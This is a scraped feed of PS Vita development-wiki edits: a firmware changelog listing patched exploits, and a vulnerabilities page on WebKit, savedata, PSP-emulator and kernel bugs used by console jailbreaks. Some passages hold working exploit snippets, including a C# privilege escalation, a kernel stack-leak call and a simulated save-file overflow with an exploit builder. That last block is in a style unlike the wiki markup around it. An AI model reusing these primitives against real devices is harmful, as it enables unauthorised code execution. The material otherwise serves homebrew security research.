;Video<br />
* Users can now sort content by size.<br />
<br />
;Photo<br />
* [Rotate Screen Automatically] has been added.<br />
* [Freeform] has been added to the list of panoramic options.<br />
|-<br />
|align=center|'''3.12'''<ref name="PSVita312">[http://wololo.net/2014/03/28/ps-vita-firmware-3-12-available-fixes-memory-card-problems/ PS Vita mandatory firmware 3.12 available – Fixes memory card problems]. Wololo.net. Retrieved on 2014-03-28.</ref><br />March 28, 2014<br />
|<br />
;System<br />
* System software stability during use of some features has been improved.<br />
* Fixes problems with bigger memory cards,<ref>http://wololo.net/2014/03/28/ps-vita-firmware-3-12-available-fixes-memory-card-problems/</ref> which occurred in system software 3.10.<br />
|-<br />
|align=center|'''3.15'''<br />April 30, 2014<br />
|<br />
;System<br />
* ''(PS Vita TV only)'' Full functionality for PlayStation Vita TV remote play with PS4 systems added.<ref>2014-04-17, [http://www.famitsu.com/news/201404/17051793.html PS4“システムソフトウェア バージョン1.70”の内容が公開、ニコニコ生放送や各配信サービス内の動画アーカイブへの対応、HDCP信号オフなど], Famitsu</ref><ref>2014-04-17, [http://weekly.ascii.jp/elem/000/000/214/214642/ PS4がバージョン1.70へのアップデートでニコ生HD配信などに対応!], Weekly ASCII</ref><br />
* Savegame exploits in various undisclosed exploit titles have been fixed.<ref>http://wololo.net/2014/04/30/ps-vita-firmware-3-15-is-now-available/</ref><br />
<br />
; PS4 Link<br />
* Linking PS Vita with PS4 is now easier.<br />
|-<br />
|align=center|'''3.18'''<br />August 7, 2014<br />
|<br />
;System<br />
*System software stability during use of some features has been improved.<br />
*No entry sign changed.<br />
|-<br />
|align=center|'''3.20'''<br />''Pre-installed Only''<br><br />
First found on October 14, 2014<br />
|<br />
;System<br />
*This firmware was only available pre-installed on the initial release of the PlayStation TV in North America and Europe.<br />
*It allows the usage of non-Asian PSN accounts on the PS TV, if set up via PS3 or proxies, but otherwise the firmware is identical to the previous version (3.18).<br />
|-<br />
|align=center|'''3.30'''<br />October 2, 2014<br />
|<br />
;System<br />
* [Theme & Background] has been added to [Settings].<br />
* Full array of languages has been added to [External Keyboard] settings (previously was Japanese and US English only).<ref name=330jp/><br />
* [Import Saved Data] feature has now been fixed after becoming broken with release of system software 3.15.<br />
* PS4 Remote Play now supports two players simultaneously.<ref name=330jp/><br />
* Added timezone for Nouméa and daylight savings support for Wellington, New Zealand.<br />
* "Intellectual Property Notices" are now listed in the app menu on the LiveArea screen.<br />
* A savegame exploit, several kernel exploits, a WebKit exploit and some internal system flaws have been fixed.<ref>http://wololo.net/2014/10/04/ps-vita-firmware-3-30-what-is-patched-what-is-still-working/</ref><br />
<br />
;Trophies<br />
* Trophy rarity can now be viewed.<br />
<br />
;Calendar<br />
* Users can now attach and send events created in [Calendar] to [Messages] and [Email]. Recipients can save those events in their own calendars.<br />
* Users can now add Friends and other players to events created in [Calendar].<br />
* The Calendar app’s LiveArea now supports the next six tagged events.<ref name=330jp/><br />
<br />
;Browser<br />
* The system's [Browser] now supports closing all open windows.<ref name=330jp>[http://www.jp.playstation.com/psvita/update/ PlayStation®Vita/PlayStation®TV システムソフトウェア バージョン3.30 アップデートについて], Accessed 2 October 2014</ref><br />
* Improvements to the [Browser]'s ability to load pages and compatibility with HTML5/JavaScript content have been made. HTML5test score increased from 291 to 345.<ref>2014-10-01, [http://www.psnstores.com/2014/10/ps-vita-system-update-3-30-now-live-adds-themes-improves-browser-allows-ps-vita-tv-to-use-na-accounts/ PS Vita System Update 3.30 Now Live: Adds Themes, Improves Browser, Allows PS Vita TV To Use NA Accounts], PSNStores</ref><br />
<br />
;Content Manager<br />
* Support for Content Manager Assistant with Windows XP and Mac OS X Leopard has been discontinued.<br />
<br />
;PS TV<br />
* The name of the VTE-1000 series has been changed to PlayStation TV or PS TV within system applications.<ref>2014年10月2日, [http://www.jp.playstation.com/info/support/sp_20141002_psvitatv.html PlayStation®Vita TVのシステムソフトウェア上の表記変更について], Sony Computer Entertainment Japan</ref><br />
* A maximum of 4 wireless controllers can be connected to the PS TV. The number of players depends on the game or application.<br />
* North American and European PSN accounts can now be used with the PlayStation TV.<br />
* Detailed warning prompt added to Standby/Shutdown screen on PlayStation TV devices.<br />
|-<br />
|align=center|'''3.35'''<br />October 28, 2014<br />
|<br />
;System<br />
*A savegame exploit in the PSP game Go! Sudoku has been fixed.<br />
*Enables compatibility with the Live from PlayStation app (requires firmware 3.30 or higher) available to download from the PS Store.<br />
;PS4 Link<br />
*Four-player Remote Play support to PlayStation TV.<br />
*Users can now adjust the video quality for Remote Play on the PS TV system according to the network environment.<br />
|-<br />
|align=center|'''3.36'''<br />January 14, 2015<br />
|<br />
;System<br />
*Fixes some internal functions of the PS Vita's PSP emulator.<br />
*A savegame exploit in an undisclosed PSP game has been fixed.<br />
*The PSP Emulator of the PS Vita has been updated to PSP firmware 6.61.<br />
|-<br />
|align=center|'''3.50'''<br />March 26, 2015<br />
|<br />
;System<br />
*Adds support for streaming in 60 frames per second while using PS4 Remote Play. If 60fps is enabled, the PS4 system will be unable to record gameplay while using Remote Play.<br />
*Accessibility has been added to the settings menu, with options such as zooming, inverted colors, closed captions, enlarged text and increased contrast options.<br />
*The Maps application has been removed.<br />
*'near' will not show Maps and other related content anymore.<br />
*PSN has been renamed to PlayStation Network<br />
*The [Chat] setting under [PlayStation Network] > [Sub Account Management] has been renamed as [Chat/User-Generated Media].<br />
*Sub account users can now be restricted from sending and receiving [Messages from other players] in [Messages].<br />
*The online-status of friends is no longer shown with a pop-up box.<br />
*Fixed savedata exploits in various PSP games (Arcade Darts, Patapon 2, Numblast, etc.).<br />
*Fixed kernel mode exploit that enabled the usage of eCFWs within the PSP emulator of the PS Vita.<br />
*Fixed the "custom bubble" exploit.<br />
*30% of the reserved 256MB memory for the operating system now free for games.<br />
|-<br />
|align=center|'''3.51'''<br />May 13, 2015<br />
|<br />
;System<br />
*System software stability during use of some features has been improved.<br />
*Additional fixes for the "custom bubble" exploit.<br />
*Fixes lag some users reported on the home screen of the system.<br />
|-<br />
|align=center|'''3.52'''<br />June 23, 2015<br />
|<br />
;System<br />
*System software stability during use of some features has been improved.<br />
*Revoked PlayStation Mobile.<ref name="Rejuvenate">http://wololo.net/2015/06/24/ps-vita-firmware-3-52-is-out-revokes-psm-support-effectively-patching-the-rejuvenate-hack-do-not-update/</ref><br />
*Fixed the "Rejuvenate" exploit.<ref name="Rejuvenate" /><br />
|-<br />
|align=center|'''3.55'''<ref>https://web.archive.org/web/20150930182904/https://www.playstation.com/en-us/support/system-updates/ps-vita/</ref><br />September 30, 2015<br />
|<br />
;System<br />
*Fixed the Mail Writer exploit.<ref name="Fail-Mail">http://wololo.net/2015/09/30/playstation-vita-firmware-3-55-is-now-available-does-it-patch-the-fail-mail-flaw/</ref><br />
*Fixes several PSP usermode exploits.<ref name="Fail-Mail" /><br />
;PS4 Link<br />
*You can now adjust the setting for video resolution when using remote play on a PS Vita system. Select (PS4 Link) > [Start] > (Options) > [Settings] > [Video Quality for Remote Play] > [Resolution]. <br />
** If video or audio skips during playback, try selecting [Low (360p)] to help improve the quality.<br />
;Parental Controls<br />
*You can now restrict [Email] from starting.<br />
|-<br />
|align=center|'''3.57'''<ref>http://gematsu.com/2016/01/ps3-ps-vita-ending-facebook-link-support</ref><br />January 20, 2016<br />
|<br />
;System<br />
*Removed the system-wide Facebook integration.<br />
*Fixed kernel mode exploit that enabled the usage of eCFWs within the PSP emulator of the PS Vita.<br />
*Fixed the "custom bubble" exploit.<ref>http://wololo.net/2016/01/20/playstation-vita-system-software-3-57-is-now-available-fixes-currently-testing/</ref><br />
|-<br />
|align=center|'''3.60'''<ref>https://www.playstation.com/en-us/support/system-updates/ps-vita/</ref><br />April 6, 2016<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
|-<br />
|align=center|'''3.61'''<ref>https://www.playstation.com/en-us/support/system-updates/ps-vita/</ref><br />August 8, 2016<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
*Fixed <code>sceIoDevctl</code> uninitialized stack memory leak used by HENkaku.<br />
*Fixed WebKit <code>JSArray::sortCompactedVector</code> vulnerability used by HENkaku.<br />
|-<br />
|align=center|'''3.63'''<ref>https://www.playstation.com/en-us/support/system-updates/ps-vita/</ref><br />November 1, 2016<br />
|<br />
;System<br />
*This system software update improves the quality of the system performance.<br />
*Fixed <code>sceNetIoctl</code> use-after-free used by HENkaku.<br />
|-<br />
|align=center|'''3.65'''<br />April 18, 2017<br />
|<br />
;System<br />
*System software stability during use of some features has been improved.<br />
*Fixed PSP emulator kernel exploit used by ARK.<br />
|-<br />
|align=center|'''3.67'''<br />November 28, 2017<br />
|<br />
;System<br />
*This system software update improves the quality of the system performance.<br />
<hr><br />
*Twitter dialog updated.<br />
*Calendar icon updated.<br />
*Added TLS 1.2 support in the web browser.<br />
*Fixed Ensō exploit.<br />
|-<br />
|align=center|'''3.68'''<br />April 10, 2018<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
<hr><br />
*Minor WebKit update (vector index masking).<ref name="WebKit-368">https://gist.github.com/StepS-/436098ac8979217d263bab2edab11ee5</ref><br />
*Fixed some devkit-specific kernel bugs.<ref name="DevKit-367">[https://twitter.com/theflow0/status/985137344570372096 Sony has fixed 3 kernel bugs in 3.68, which combined, could lead to kernel code execution on a devkit]. TheFloW (@theflow0) on Twitter</ref><ref name="DevKit-367-sceMotionDevGetEvaInfo">[https://twitter.com/theflow0/status/984919058863845378 sceMotionDevGetEvaInfo could leak 0x48 bytes of kernel stack]. TheFloW (@theflow0) on Twitter</ref><br />
|-<br />
|align=center|'''3.69'''<br />September 10, 2018<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
<hr><br />
*Fixed some bugs in SceNgs<br />
*SSL library updated (along with the other networking libraries that use SceSsl); two new root certificates added<br />
|-<br />
|align=center|'''3.70'''<br />January 14, 2019<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
<hr><br />
*Changed the enc key<br />
*Forgot to change any other keys. Oops!<br />
|-<br />
|align=center|'''3.71'''<br />July 23, 2019<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
<hr><br />
*Fixed the Trinity exploit chain<br />
|-<br />
|align=center|'''3.72'''<br />August 27, 2019<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
|-<br />
|align=center|'''3.73'''<br />October 16, 2019<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
|-<br />
|}<br />
<br />
[[Category:Firmware]]</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=Main_Page/Header&diff=11638Main Page/Header2019-09-28T14:43:45Z<p>Xyz: Undo revision 11235 by Xyz (talk)</p>
<hr />
<div><br />
== Welcome To Vita Development Wiki ==<br />
<br />
Chat with us on Discord: [https://discord.gg/m7QGqj5 HENkaku #wiki] (most active, stay around until someone answers!).<br />
<br />
Alternatively, you can chat with us on Matrix: [https://riot.im/app/#/room/#henkaku:matrix.org #henkaku:matrix.org] (guest access enabled) or on IRC: [irc://chat.freenode.net/henkaku #henkaku] @ freenode (deprecated and not recommended).</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=Main_Page/Header&diff=11637Main Page/Header2019-09-28T14:43:03Z<p>Xyz: Reverted edits by CelesteBlue (talk) to last revision by Xyz</p>
<hr />
<div><br />
== Welcome To The One And Only Vita Development Wiki ==<br />
<br />
Chat with us on Discord: [https://discord.gg/m7QGqj5 HENkaku #wiki] (most active, stay around until someone answers!).<br />
<br />
Alternatively, you can chat with us on Matrix: [https://riot.im/app/#/room/#henkaku:matrix.org #henkaku:matrix.org] (guest access enabled) or on IRC: [irc://chat.freenode.net/henkaku #henkaku] @ freenode (deprecated and not recommended).</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=Vulnerabilities&diff=11507Vulnerabilities2019-09-18T23:08:53Z<p>Xyz: /* F00D Processor */</p>
<hr />
<div>== Userland ==<br />
<br />
=== WebKit exploits ===<br />
<br />
==== WebKit exploits in Email app ====<br />
<br />
Implemented by xyz so that HENkaku can be launched offline.<br />
<br />
See [https://blog.xyz.is/2016/henkaku-offline-installer.html xyz's writeup].<br />
<br />
==== WebKit 531.22.8 (Vita FW <= 1.81) (CVE-2010-4577 and CVE-2010-1807) ====<br />
<br />
There are two exploits used for WebKit prior to 2.00. One is a data leakage exploit, CVE-2010-4577,<ref>https://code.google.com/p/chromium/issues/detail?id=63866</ref> which uses type confusion to treat a double as a string memory address and length. The other is a type confusion exploit, CVE-2010-1807, on the parseFloat() function using a NaN as the argument.<ref>http://imthezuk.blogspot.com/2010/11/float-parsing-use-after-free.html</ref><br />
<br />
==== WebKit 536.26 (Vita FW 2.00-3.20) (CVE-2012-3748) (PSA 2013-09-03-1) ====<br />
<br />
Ported to PSVita by many people. Patched on FW 3.30.<br />
<br />
The heap memory buffer overflow vulnerability exists within WebKit's JavaScriptCore JSArray::sort(...) method. This method accepts a user-defined JavaScript function and calls it from native code to compare array items. If this compare function reduces the array length, the trailing array items are written outside the "m_storage->m_vector[]" buffer, which leads to heap memory corruption.<br />
<br />
[http://packetstormsecurity.com/files/123088/ Packet Storm Exploit 2013-0903-1 - Apple Safari Heap Buffer Overflow]<br />
<br />
[https://bitbucket.org/DaveeFTW/psvita-260-webkit/src/master/ exploit code by Davee]<br />
<br />
==== WebKit 537.73 (as used in Vita FW 3.30-3.36) (CVE-2014-1303) ====<br />
<br />
Ported to PSVita by xyz. Patched on FW 3.50.<br />
<br />
The CSSSelectorList can be mutated after it is allocated. If the mutated list contains fewer entries than the original one, a restrictive 1-bit OOB write can be achieved.<br />
<ref>https://www.blackhat.com/docs/eu-14/materials/eu-14-Chen-WebKit-Everywhere-Secure-Or-Not.PDF</ref><br />
<ref>https://www.blackhat.com/docs/eu-14/materials/eu-14-Chen-WebKit-Everywhere-Secure-Or-Not-WP.pdf</ref><br />
<ref>https://cansecwest.com/slides/2015/Liang_CanSecWest2015.pdf</ref><br />
<br />
==== WebKit 537.73 (as used in Vita FW 3.30-3.60) (JSArray::sortCompactedVector) ====<br />
<br />
Discovered by xyz. Implemented in HENkaku by Molecule Team. Patched in FW 3.61 (see [https://blog.xyz.is/2016/webkit-360.html#bonus-how-sony-patched-it how it was patched]).<br />
<br />
The JSArray::sort method has a heap use-after-free vulnerability. If an array containing an object with a custom toString method is sorted, and the toString method causes the array to be reallocated, then the sorted elements will be written to the old freed address.<br />
<br />
[https://blog.xyz.is/2016/webkit-360.html xyz's writeup about 3.60 webkit exploit]<br />
<br />
[https://blog.xyz.is/2016/henkaku-offline-installer.html xyz's writeup about ROP in webbrowser]<br />
<br />
[https://github.com/henkaku/henkaku/blob/master/webkit/exploit.js 3.60 webkit exploit source code by xyz]<br />
<br />
[https://gist.github.com/St4rk/f1375a22dad6e5bbcff8067fdf26600f 3.60 webkit exploit commented code by St4rk]<br />
<br />
==== WebKit 537.73 (as used in Vita FW 3.30-3.72) (to be disclosed) ====<br />
<br />
It will be released at the same time as xyz's next PSVita kernel exploits, named 2050 and 2051. TheFloW also has a WebKit exploit, which may or may not be the same as xyz's.<br />
<br />
Working on <= 3.72. Not patched yet.<br />
<br />
=== PSM (PlayStation Mobile) exploits ===<br />
<br />
PSM apps for PSVita were removed from the PSStore in 2015. Nevertheless, a set of tricks allows installing and using PSM on any PSVita on FW <=3.51.<br />
<br />
PSM apps cannot work on FW >=3.52 because they are blacklisted in the PSVita OS. This can only be bypassed with a kernel exploit and the ref00d plugin.<br />
<br />
==== PSM Dev For Unity can be installed without PSStore ====<br />
<br />
PSM Dev For Unity is packed into a DRM-free .pkg. It can therefore be installed using PKG Installer or the BGDL .pkg trick. Not patchable.<br />
<br />
==== PSM+ ====<br />
<br />
The PSM developer license can be spoofed using filesystem write access and signed with the keys.<br />
<br />
==== PSM Mono privilege escalation ====<br />
<br />
See [https://yifan.lu/2015/06/21/hacking-the-ps-vita/ writeup by yifan lu].<br />
<br />
==== PSM Unity privilege escalation ====<br />
<br />
UnityEngine.dll is a trusted assembly (SecurityCritical) and is not signed (it can be modified). However, the actual file at <code>ux0:app/PCSI00009/managed/UnityEngine.dll</code> is [[PFS]] signed and encrypted, making this (and any) resource-based hack just as difficult as an unsigned code execution hack (which is the original goal).<br />
<br />
==== PSM NetworkRequest privilege escalation ====<br />
<br />
NetworkRequest.BeginGetResponse(AsyncCallback callback) invokes the callback as <code>SecurityCritical</code>, allowing a privilege escalation. Unfortunately, Sony closed down the scoreboards feature,<ref>http://community.eu.playstation.com/t5/Announcements-Events/PSM-scoreboard-service-is-closing/td-p/21263959</ref> which means that Network.AuthGetTicket() fails and Network.CreateRequest() cannot be invoked. There is no other way of creating a NetworkRequest object.<br />
<br />
<source lang="csharp"><br />
using System;<br />
using System.Security;<br />
using System.Runtime.InteropServices;<br />
using Sce.PlayStation.Core.Services;<br />
<br />
namespace NetHax<br />
{<br />
    public class AppMain<br />
    {<br />
        // Runs as SecurityCritical when BeginGetResponse invokes it,<br />
        // so the Marshal call below is reached from an escalated context.<br />
        [SecurityCritical]<br />
        public static void Escalate (IAsyncResult result)<br />
        {<br />
            Console.WriteLine("Should be SecurityCritical");<br />
            IntPtr ptr = Marshal.AllocHGlobal(1000);<br />
            Console.WriteLine("Look at me allocating memory: 0x{0:X}", ptr);<br />
        }<br />
<br />
        public static void Main (string[] args)<br />
        {<br />
            Network.Initialize("af1c0a1b-a7b8-4597-a022-eee91e6735d1");<br />
            Network.AuthGetTicket();   // fails since the scoreboard service was closed<br />
            NetworkRequest req = Network.CreateRequest(NetworkRequestType.Get, "", "");<br />
            IAsyncResult result = req.BeginGetResponse(new AsyncCallback(Escalate));<br />
            while (!result.IsCompleted)<br />
            {<br />
                Console.WriteLine("waiting...");<br />
            }<br />
            Console.WriteLine("Completed!");<br />
        }<br />
    }<br />
}<br />
</source><br />
<br />
=== Game savedata exploits ===<br />
<br />
Discovered in 2015 by TheFlow. Released on 2018-06-29.<br />
<br />
This sort of exploit works in theory on any firmware (not patchable, or only with difficulty).<br />
<br />
==== Savedata exploits VS WebKit exploits ====<br />
<br />
h-encore uses a different entry point than its predecessor HENkaku. Instead of a WebKit exploit, it uses a gamesave exploit. The reason is that after firmware 3.30 or so, Sony introduced [[SceKernelModulemgr#sceKernelInhibitLoadingModule|sceKernelInhibitLoadingModule]]() in their browser, which prevented us from loading additional sysmodules. This limitation is crucial, since loading sysmodules was the only way to get more syscalls (than the browser uses), as they are randomized at boot and only assigned to syscall slots if some user module imports them. h-encore needs to load SceNgsUser, a sysmodule vulnerable to kexploits.<br />
<br />
==== Old games do not have ASLR ====<br />
<br />
The reason why a gamesave exploit is possible on such a system is that games developed with SDK 2.60 and lower were compiled as statically linked executables, so their loading address is always the same, namely 0x81000000, and they cannot be relocated to another region. They also don't have stack protection enabled by default, which means that if we can smash the stack in such a game, we can happily do ROP.<br />
<br />
==== Method for finding a savedata bug ====<br />
<br />
Looking for gamesave exploits is a boring process: you just fuzz gamesaves by writing random stuff at random locations until you get a crash (the best bet is extending strings and hoping that you can smash the stack).<br />
<br />
==== Bittersmile game buffer overflow (h-encore) ====<br />
<br />
The Bittersmile game was found exploitable on 2018-02-17 by Freakler. Implemented in h-encore by TheFloW.<br />
<br />
The bug is in the Bittersmile save parser. The gamesave is actually a text file: the game reads it line by line and copies each line into one of a list of buffers without validating the length, so if we place the \n delimiter far enough away that the line is longer than the buffer can hold, we get a classic buffer overflow.<br />
If this buffer were on the stack, we could overwrite the return address and directly execute our ROP chain. It is in the data section instead, but luckily for us the content after the buffer is the list of destinations for the other lines. This means that if we overflow into the list and redirect a destination, the game copies the next line to wherever we want, which gives us an arbitrary write primitive.<br />
<br />
Not patchable. The Bittersmile game requires a minimum FW of ?2.50? to run.<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#buffer-overflow h-encore writeup by TheFloW]<br />
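The overflow-into-the-destination-list pattern described above, modelled in C as an added example (this is not code from h-encore or from the Bittersmile game): a fixed-size staging buffer in static data is immediately followed by the table of destinations for the parsed lines, the vulnerable parser copies each line into the staging buffer with no length check, and a constructed save file uses its first line to redirect one table entry so that the second line lands on a location of the attacker's choosing. Because this simulation runs under ASLR, the table holds 32-bit offsets into a static arena rather than the absolute pointers the real game has at its fixed 0x81000000 load address; the layout, buffer sizes, offsets and both sample saves are assumptions of the model. A hardened parser that bounds the copy is shown beside the vulnerable one.<br />

```c
#include <stdint.h>
#include <string.h>

#define LINE_BUF 16   /* size of the game's fixed staging buffer (assumed) */
#define NLINES   4    /* entries in the destination table (assumed) */

/* One static arena stands in for the game's data section.  As in the text,
 * the staging buffer is immediately followed by the table of destinations
 * for the parsed lines.  The real game is loaded at a fixed address and
 * keeps absolute pointers there; this model runs under ASLR, so the table
 * holds 32-bit offsets into the arena instead (an assumption of the model). */
enum {
    OFF_LINE_BUF = 0,
    OFF_DEST     = OFF_LINE_BUF + LINE_BUF,
    OFF_STORAGE  = OFF_DEST + NLINES * 4,
    OFF_TARGET   = 512,          /* memory a save file must never reach */
    ARENA_SIZE   = 1024
};

static unsigned char g_arena[ARENA_SIZE];

const unsigned char k_normal_save[] = "HERO\nLEVEL7\n";   /* constructed benign save */

static uint32_t rd32(size_t off) { uint32_t v; memcpy(&v, g_arena + off, 4); return v; }
static void wr32(unsigned char *p, uint32_t v) { memcpy(p, &v, 4); }

void game_reset(void)
{
    memset(g_arena, 0, sizeof g_arena);
    for (int i = 0; i < NLINES; i++)        /* dest[i] -> storage slot i */
        wr32(g_arena + OFF_DEST + 4 * i, OFF_STORAGE + i * LINE_BUF);
}

const char *game_storage(int i) { return (const char *)(g_arena + OFF_STORAGE + i * LINE_BUF); }
const char *game_target(void)   { return (const char *)(g_arena + OFF_TARGET); }

/* Vulnerable parser: each '\n'-delimited line is staged in line_buf with no
 * length check, then copied to dest[i].  An over-long first line runs past
 * line_buf into the dest table, so the second line lands wherever the
 * attacker pointed dest[1]: an arbitrary write. */
int parse_save_vuln(const unsigned char *save, size_t len)
{
    unsigned char *line_buf = g_arena + OFF_LINE_BUF;
    size_t pos = 0;

    for (int i = 0; i < NLINES && pos < len; i++) {
        size_t n = 0;
        /* BUG: n is never compared with LINE_BUF (the ARENA_SIZE bound only
         * keeps the simulation inside its own arena). */
        while (pos < len && save[pos] != '\n' && n < (size_t)ARENA_SIZE)
            line_buf[n++] = save[pos++];
        pos++;                                      /* skip the delimiter */

        uint32_t dst = rd32(OFF_DEST + 4 * i);      /* may be attacker-controlled */
        if (dst + LINE_BUF > ARENA_SIZE)
            return -1;                              /* simulation guard only */
        memcpy(g_arena + dst, line_buf, n < (size_t)LINE_BUF ? n : (size_t)LINE_BUF);
    }
    return 0;
}

/* Hardened parser: a line that does not fit the staging buffer is rejected
 * before anything is written past it, and so is a destination outside the
 * storage slots. */
int parse_save_safe(const unsigned char *save, size_t len)
{
    unsigned char *line_buf = g_arena + OFF_LINE_BUF;
    size_t pos = 0;

    for (int i = 0; i < NLINES && pos < len; i++) {
        size_t n = 0;
        while (pos < len && save[pos] != '\n') {
            if (n >= (size_t)LINE_BUF - 1)
                return -1;                          /* line too long */
            line_buf[n++] = save[pos++];
        }
        pos++;
        line_buf[n] = 0;

        uint32_t dst = rd32(OFF_DEST + 4 * i);
        if (dst < OFF_STORAGE || dst + LINE_BUF > OFF_STORAGE + NLINES * LINE_BUF)
            return -1;                              /* destination out of range */
        memcpy(g_arena + dst, line_buf, n + 1);
    }
    return 0;
}

/* Constructed exploit save (not the real h-encore payload).  Line 0 fills
 * line_buf, then overwrites dest[0] (kept at its normal slot, so the line's
 * own copy is harmless) and dest[1] (redirected to OFF_TARGET).  Line 1 is
 * the payload the game then copies to OFF_TARGET.  The offsets 0x20 and
 * 0x200 contain no '\n' byte, so the parser does not split line 0 early. */
size_t build_exploit_save(unsigned char *out, size_t cap)
{
    static const char payload[] = "PWNED";
    size_t n = 0;
    if (cap < LINE_BUF + 4 + 4 + 1 + (sizeof payload - 1) + 1)
        return 0;
    memset(out, 'A', LINE_BUF);                     n += LINE_BUF;
    wr32(out + n, OFF_STORAGE);                     n += 4;    /* dest[0] */
    wr32(out + n, OFF_TARGET);                      n += 4;    /* dest[1] */
    out[n++] = '\n';
    memcpy(out + n, payload, sizeof payload - 1);   n += sizeof payload - 1;
    out[n++] = '\n';
    return n;
}
```

Running the vulnerable parser over the constructed exploit save leaves "PWNED" at OFF_TARGET, which no destination ever pointed to; the hardened parser rejects the same save at the 16th byte of line 0, before the table can be touched. On the real console the same redirection writes to any address in the game's statically mapped image, which is what h-encore builds its ROP chain from.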
<br />
=== PSP Emulator escape ===<br />
<br />
See [https://theofficialflow.github.io/2019/06/18/trinity.html#psp-emulator-escape Trinity writeup by TheFloW].<br />
<br />
==== Why hack the PSP Emulator? Why not WebKit/games? ====<br />
<br />
The PSP Emulator runs at system privileges, which are equivalent to root. By gaining control over the emulator, we are exposed to almost ALL syscalls, unlike the WebKit process, which is sandboxed. Similarly, the previous jailbreak h-encore exploited a gamesave vulnerability so that it could invoke the NGS syscalls.<br />
<br />
==== Buffer overflow in ScePspemuRemoteNet-KERMIT_CMD_ADHOC_CREATE ====<br />
<br />
Discovered on 2018-05-26 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#stack-smash writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
==== CSC does not sanity-check the row number (arbitrary userland memory read) ====<br />
<br />
Discovered on 2018-06-04 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#csc-arbitrary-read writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
== System ==<br />
<br />
=== PSVita can use PSP/PS3 PSStore licenses ===<br />
<br />
PSVita can use a .rif downloaded from PSVita, PSP, or PS3 (ReStore by CelesteBlue).<br />
<br />
PSVita can use a PSP or PS3 act.dat if we spoof the ConsoleId (idps) and OpenPSID (ReNpDrm by CelesteBlue).<br />
<br />
This means that however much Sony secures the PSVita store, we will always be able to activate as long as the PS3 store is not secured.<br />
<br />
=== PSStore Activation server does not check challenge anymore ===<br />
<br />
Since May 2018, the challenge string in requests sent from the PSVita to PSN for content and PSN account activations is no longer checked server-side.<br />
<br />
This means that to activate a PSVita, we only have to spoof the firmware version to bypass the FW update popup, and spoof a recent PSN passcode key in SceShell. Both are done by taiHEN (in henkaku.suprx). This also means ReStore and ReNpDrm are no longer needed.<br />
<br />
== Kernel ==<br />
<br />
=== Syscall handler doesn't check syscall id (integer overflow) ===<br />
<br />
Discovered on 2015-07-03 by Molecule Team.<br />
<br />
A large syscall id passed in R12 can index past the end of the syscall table, causing an arbitrary kernel function pointer to be dereferenced and executed.<br />
<br />
Tested on 1.50-1.60. Patched on 1.61.<br />
<br />
=== Syscall handler leaks syscall table vaddr ===<br />
<br />
Calling svc with an invalid syscall id ends the svc interrupt without clearing the syscall table vaddr from r0.<br />
<br />
Tested on 1.50. ?Patched on 1.61?<br />
<br />
=== Stack buffer overflow in sceSblDmac5EncDec ===<br />
<br />
Discovered on 2014-09-16 by Molecule Team. Implemented in xyz's 1.61 exploit chain in 2016, then in CelesteBlue's QuickHEN_PSVITA.<br />
<br />
[[SceSblSsMgr#sceSblDmac5EncDec|SceSblDmac5Mgr_sceSblDmac5EncDec]]<br />
<br />
<pre><br />
This function:<br />
reads in 0x18 bytes from first arg<br />
processes a little<br />
then:<br />
ROM:005F711A MOV R1, R11<br />
ROM:005F711C ADD R0, SP, #0x88+var_70<br />
ROM:005F711E MOV.W R2, R10,LSR#3<br />
ROM:005F7122 BLX _import_SceSblSsMgr_SceSysmemForDriver_sceKernelMemcpyUserToKernelForDriver<br />
R10 comes from original read in buffer+0x10<br />
</pre><br />
<br />
Tested on 1.61. Patched on 1.80. They also added an IsShell check.<br />
<br />
=== Kernel stack leak in sceIoDevctl ===<br />
<br />
Discovered on 2014-11-24 by Molecule Team. Used in HENkaku by Molecule Team.<br />
<br />
Tested successfully on firmware 0.995 in an fself. Since at least firmware 1.030, it works only from WebKit exploits (not from an fself or games, but maybe from ePSP or PSM).<br />
<br />
Call some functions that interest you in a kernel context (i.e. some syscalls, for example sceIoOpen), then call sceIoDevctl and get up to 0x3FF bytes of that kernel stack!<br />
<br />
<source lang="C"><br />
#include <string.h><br />
#include <psp2/io/fcntl.h>   // sceIoOpen (vitasdk header)<br />
#include <psp2/io/devctl.h>  // sceIoDevctl (vitasdk header)<br />
<br />
// make a buffer, tagged with '0x66' bytes so untouched bytes are easy to spot<br />
char outbuf[0x400];<br />
memset(outbuf, 0x66, 0x400);<br />
<br />
sceIoOpen("molecule0:", 0, 0); // populate the kernel stack with this call's frames<br />
<br />
// kernel stack leak to outbuf (up to 0x3FF bytes)<br />
sceIoDevctl("sdstor0:", 5, "xmc-lp-ign-userext", 0x14, &outbuf, 0x3FF);<br />
<br />
// check if our data was actually written to outbuf; hex_dump is your own helper<br />
hex_dump("kstack", (unsigned char*) outbuf, 0x400);<br />
</source><br />
<br />
Fixed in 3.61.<br />
<br />
=== Heap use-after-free in sceNetSyscallIoctl ===<br />
<br />
Discovered on 2016-04-05 by Molecule Team. Implemented in HENkaku by Molecule Team.<br />
<br />
See [https://blog.xyz.is/2016/vita-netps-ioctl.html xyz's writeup].<br />
<br />
sceNetSyscallIoctl is declared as <code>int sceNetSyscallIoctl(int s, unsigned flags, void *umem)</code>. When <code>memsz = (flags_ >> 16) & 0x1FFF</code> is in the range (0x80; 0x1000], it uses the SceNetPs custom malloc to allocate a buffer of that size on the heap.<br />
<br />
However, the second argument to malloc is 0, meaning that when not enough memory is available, instead of returning NULL it unlocks the global SceNetPs mutex and waits on a semaphore.<br />
<br />
Then, while malloc is waiting, another thread can free the socket sceNetSyscallIoctl is operating on, causing a use-after-free condition.<br />
<br />
